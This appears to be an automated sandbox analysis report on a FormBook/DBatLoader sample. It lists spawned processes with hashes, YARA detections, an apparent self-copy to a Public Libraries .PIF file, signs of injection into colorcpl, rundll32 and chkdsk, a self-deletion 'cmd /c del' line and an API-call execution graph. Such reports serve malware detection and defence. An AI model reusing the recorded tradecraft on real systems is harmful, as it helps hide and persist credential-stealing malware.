                                                                                                  MD5 hash:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:14:56:19
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                  Imagebase:0x1d0000
                                                                                                  File size:86'528 bytes
                                                                                                  MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:14:56:21
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff609140000
                                                                                                  File size:5'141'208 bytes
                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:14:56:24
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                  Imagebase:0xc00000
                                                                                                  File size:61'440 bytes
                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:14:56:27
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del "C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:14:56:27
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:14:56:28
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Users\Public\Libraries\Telragab.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Telragab.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5 hash:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Telragab.PIF, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 70%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:14:56:38
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Users\Public\Libraries\Telragab.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Telragab.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5 hash:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:14:56:46
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                  Imagebase:0x1d0000
                                                                                                  File size:86'528 bytes
                                                                                                  MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:14:56:47
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Imagebase:0x590000
                                                                                                  File size:23'040 bytes
                                                                                                  MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:14:56:53
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\SndVol.exe
                                                                                                  Imagebase:0xf90000
                                                                                                  File size:226'712 bytes
                                                                                                  MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:14:56:54
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
                                                                                                  Imagebase:0x7c0000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.9%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:21.8%
                                                                                                    Total number of Nodes:565
                                                                                                    Total number of Limit Nodes:27
                                                                                                    execution_graph 42966 330c850 42967 330c867 42966->42967 42968 330c892 RegOpenKeyA 42967->42968 42969 330c8a0 42968->42969 42977 32b4ca4 42969->42977 42971 330c8b8 42972 330c8c5 RegSetValueExA RegCloseKey 42971->42972 42983 32b47ac 42972->42983 42978 32b4c58 42977->42978 42979 32b4c93 42978->42979 42991 32b484c 42978->42991 42979->42971 42981 32b4c6f 42981->42979 42996 32b2cc8 11 API calls 42981->42996 42985 32b47b2 42983->42985 42984 32b47d8 42987 32b4788 42984->42987 42985->42984 43006 32b2cc8 11 API calls 42985->43006 42988 32b47a9 42987->42988 42989 32b478e 42987->42989 42989->42988 43007 32b2cc8 11 API calls 42989->43007 42992 32b4850 42991->42992 42993 32b4874 42991->42993 42997 32b2cac 42992->42997 42993->42981 42995 32b485d 42995->42981 42996->42979 42998 32b2cb0 42997->42998 42998->42995 42999 32b2dd5 42998->42999 43000 32b2cba 42998->43000 43004 32b686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 42998->43004 43005 32b2da4 7 API calls 42999->43005 43000->42995 43003 32b2df6 43003->42995 43004->42999 43005->43003 43006->42985 43007->42988 43008 3319740 43018 32b68b8 43008->43018 43012 331976e 43023 33180a8 timeSetEvent 43012->43023 43014 3319778 43015 3319786 GetMessageA 43014->43015 43016 3319796 43015->43016 43017 331977a TranslateMessage DispatchMessageA 43015->43017 43017->43015 43019 32b68c3 43018->43019 43024 32b4444 43019->43024 43022 32b4558 SysAllocStringLen SysFreeString SysReAllocStringLen 43022->43012 43023->43014 43025 32b448a 43024->43025 43026 32b4503 43025->43026 43027 32b4694 43025->43027 43038 32b43dc 43026->43038 43029 32b46c5 43027->43029 43033 32b46d6 43027->43033 43044 32b4608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 43029->43044 43032 32b46cf 43032->43033 43034 32b471b FreeLibrary 43033->43034 43035 32b473f 43033->43035 43034->43033 43036 32b4748 43035->43036 43037 32b474e ExitProcess 43035->43037 43036->43037 43039 32b441f 43038->43039 43040 32b43ec 43038->43040 43039->43022 43040->43039 43045 32b1668 43040->43045 43049 33195f8 43040->43049 43063 32b5b78 43040->43063 43044->43032 43067 32b15fc 43045->43067 43047 32b1670 VirtualAlloc 43048 32b1687 43047->43048 43048->43040 43050 3319670 43049->43050 43051 3319612 GetVersion 43049->43051 43050->43040 43069 32f7438 GetCurrentProcessId 43051->43069 43055 3319636 43101 32c7200 44 API calls 43055->43101 43057 3319640 43102 32c71ac 44 API calls 43057->43102 43059 3319650 43103 32c71ac 44 API calls 43059->43103 43061 3319660 43104 32c71ac 44 API calls 43061->43104 43064 32b5b88 GetModuleFileNameA 43063->43064 43065 32b5ba4 43063->43065 43284 32b5ddc GetModuleFileNameA RegOpenKeyExA 43064->43284 43065->43040 43068 32b159c 43067->43068 43068->43047 43105 32b96ec 43069->43105 43073 32f7481 43074 32f748b GlobalAddAtomA GetCurrentThreadId 43073->43074 43075 32b96ec 42 API calls 43074->43075 43076 32f74c5 43075->43076 43077 32b47dc 11 API calls 43076->43077 43078 32f74d2 43077->43078 43079 32f74dc GlobalAddAtomA 43078->43079 43114 32b4c4c 43079->43114 43083 32f7509 43120 32f7040 43083->43120 43085 32f7513 43128 32f6dec 43085->43128 43087 32f751f 43132 3301550 43087->43132 43089 32f7532 43149 3302758 43089->43149 43091 32f7548 43166 32c72ec 44 API calls 43091->43166 43093 32f7572 GetModuleHandleA 43094 32f7592 43093->43094 43095 32f7582 GetProcAddress 43093->43095 43096 32b4788 11 API calls 43094->43096 43095->43094 43097 32f75a7 43096->43097 43098 32b4788 11 API calls 43097->43098 43099 32f75af 43098->43099 43100 32c7160 44 API calls 43099->43100 43100->43055 43101->43057 43102->43059 43103->43061 43104->43050 43167 32b9700 43105->43167 43108 32b47dc 43109 32b47e0 43108->43109 43112 32b47f0 43108->43112 43111 32b484c 11 API calls 43109->43111 43109->43112 43110 32b481e 43110->43073 43111->43112 43112->43110 43197 32b2cc8 11 API calls 43112->43197 43115 32b4c50 RegisterWindowMessageA 43114->43115 43116 32c7b44 43115->43116 43117 32c7b4a 43116->43117 43118 32c7b5f InitializeCriticalSection 43117->43118 43119 32c7b74 43118->43119 43119->43083 43121 32f71ad 43120->43121 43122 32f7054 SetErrorMode 43120->43122 43121->43085 43123 32f7078 GetModuleHandleA GetProcAddress 43122->43123 43124 32f7094 43122->43124 43123->43124 43125 32f718f SetErrorMode 43124->43125 43126 32f70a1 LoadLibraryA 43124->43126 43125->43085 43126->43125 43127 32f70bd 10 API calls 43126->43127 43127->43125 43129 32f6df2 43128->43129 43198 32f6fdc 43129->43198 43131 32f6e60 43131->43087 43133 330155a 43132->43133 43211 32cd8bc 43133->43211 43135 3301570 43215 330190c LoadCursorA 43135->43215 43138 33015a9 43139 33015e5 GetDC GetDeviceCaps ReleaseDC 43138->43139 43140 330161b 43139->43140 43220 32d1ffc 43140->43220 43142 3301627 43143 32d1ffc 13 API calls 43142->43143 43144 3301639 43143->43144 43145 32d1ffc 13 API calls 43144->43145 43146 330164b 43145->43146 43224 3301d3c 43146->43224 43148 3301658 43148->43089 43150 3302767 43149->43150 43151 32cd8bc 42 API calls 43150->43151 43152 330277d 43151->43152 43153 330283a LoadIconA 43152->43153 43262 32d753c 43153->43262 43155 330285d GetModuleFileNameA OemToCharA 43156 33028a6 43155->43156 43157 33028cc CharNextA CharLowerA 43156->43157 43158 33028f4 43157->43158 43264 32cea38 GetClassInfoA 43158->43264 43161 3302916 43274 3302aac 60 API calls 43161->43274 43162 330291d 43275 3304b2c 11 API calls 43162->43275 43165 330293f 43165->43091 43166->43093 43168 32b9726 43167->43168 43170 32b9759 43168->43170 43180 32b92f4 42 API calls 43168->43180 43171 32b97c3 43170->43171 43178 32b9776 43170->43178 43191 32b4878 43171->43191 43173 32b97b7 43175 32b4ed4 11 API calls 43173->43175 43174 32b96fb 43174->43108 43175->43174 43176 32b4788 11 API calls 43176->43178 43178->43173 43178->43176 43181 32b4ed4 43178->43181 43190 32b92f4 42 API calls 43178->43190 43180->43170 43182 32b4ee1 43181->43182 43189 32b4f11 43181->43189 43183 32b4f0a 43182->43183 43185 32b4eed 43182->43185 43186 32b484c 11 API calls 43183->43186 43184 32b4788 11 API calls 43187 32b4efb 43184->43187 43196 32b2ce0 11 API calls 43185->43196 43186->43189 43187->43178 43189->43184 43190->43178 43192 32b484c 11 API calls 43191->43192 43193 32b4888 43192->43193 43194 32b4788 11 API calls 43193->43194 43195 32b48a0 43194->43195 43195->43174 43196->43187 43197->43110 43199 32f6fe4 43198->43199 43201 32f6feb 43198->43201 43200 32f6fe9 43199->43200 43204 32f7027 SendMessageA 43199->43204 43205 32f7016 SystemParametersInfoA 43199->43205 43200->43131 43202 32f6ff8 43201->43202 43203 32f7001 43201->43203 43209 32f6f6c 6 API calls 43202->43209 43210 32f6f3c SystemParametersInfoA 43203->43210 43204->43200 43205->43200 43208 32f7008 43208->43131 43209->43200 43210->43208 43212 32cd8c3 43211->43212 43213 32cd8e8 43212->43213 43242 32cda78 42 API calls 43212->43242 43213->43135 43216 330192b 43215->43216 43217 3301944 LoadCursorA 43216->43217 43219 3301593 GetKeyboardLayout 43216->43219 43243 33019c8 43217->43243 43219->43138 43221 32d2002 43220->43221 43246 32d1508 43221->43246 43223 32d2024 43223->43142 43225 3301d55 43224->43225 43226 3301d87 SystemParametersInfoA 43225->43226 43227 3301db2 GetStockObject 43226->43227 43228 3301d9a CreateFontIndirectA 43226->43228 43257 32d244c 16 API calls 43227->43257 43256 32d244c 16 API calls 43228->43256 43231 3301db0 43232 3301dc6 SystemParametersInfoA 43231->43232 43233 3301de6 CreateFontIndirectA 43232->43233 43234 3301e1a 43232->43234 43258 32d244c 16 API calls 43233->43258 43260 32d2530 16 API calls 43234->43260 43237 3301dff CreateFontIndirectA 43259 32d244c 16 API calls 43237->43259 43238 3301e2a GetStockObject 43261 32d244c 16 API calls 43238->43261 43241 3301e18 43241->43148 43242->43213 43244 32b2cac 11 API calls 43243->43244 43245 33019db 43244->43245 43245->43216 43247 32d1523 43246->43247 43254 32d14f0 EnterCriticalSection 43247->43254 43249 32d152d 43251 32b2cac 11 API calls 43249->43251 43253 32d158a 43249->43253 43251->43253 43252 32d15db 43252->43223 43255 32d14fc LeaveCriticalSection 43253->43255 43254->43249 43255->43252 43256->43231 43257->43232 43258->43237 43259->43241 43260->43238 43261->43241 43263 32d7548 43262->43263 43263->43155 43265 32cea68 43264->43265 43266 32cea91 43265->43266 43267 32cea76 UnregisterClassA 43265->43267 43268 32cea87 RegisterClassA 43265->43268 43276 32b738c 43266->43276 43267->43268 43268->43266 43270 32ceadc 43270->43161 43270->43162 43271 32ceabf 43271->43270 43280 32ce97c 43271->43280 43273 32cead3 SetWindowLongA 43273->43270 43274->43162 43275->43165 43283 32b2ffc 43276->43283 43278 32b739f CreateWindowExA 43279 32b73d9 43278->43279 43279->43271 43281 32ce98c VirtualAlloc 43280->43281 43282 32ce9ba 43280->43282 43281->43282 43282->43273 43283->43278 43285 32b5e5f 43284->43285 43286 32b5e1f RegOpenKeyExA 43284->43286 43302 32b5c18 12 API calls 43285->43302 43286->43285 43287 32b5e3d RegOpenKeyExA 43286->43287 43287->43285 43289 32b5ee8 lstrcpynA GetThreadLocale GetLocaleInfoA 43287->43289 43293 32b5f1f 43289->43293 43294 32b6002 43289->43294 43290 32b5e84 RegQueryValueExA 43291 32b5ec2 RegCloseKey 